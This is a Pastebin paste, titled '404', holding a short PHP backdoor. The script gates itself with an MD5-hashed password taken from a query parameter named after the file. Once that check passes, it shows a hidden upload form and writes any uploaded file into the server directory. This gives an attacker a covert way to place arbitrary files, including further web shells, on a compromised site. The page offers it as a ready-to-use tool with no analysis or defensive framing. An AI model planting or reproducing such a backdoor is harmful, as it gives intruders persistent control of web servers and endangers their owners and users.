Advertisement
bioskopcgv

404

Sep 10th, 2019
217
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.39 KB | None | 0 0
  1. <?php
  2. $r=md5($_GET[str_replace(".php", "",basename($_SERVER['SCRIPT_NAME']))]);
  3. if($r=="899bad0fe1e6fbb287f90ce751900fbb"){
  4. $b = $_FILES['file']['name'];
  5. $a = $_FILES['file']['tmp_name'];
  6. echo "<h2 hidden>bioskopcgv@gmail.com</h2><form method='POST' enctype='multipart/form-data'><input type='file'name='file' /><input type='submit' value='submit' /></form>";
  7. move_uploaded_file($a,$b);
  8. }
  9. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement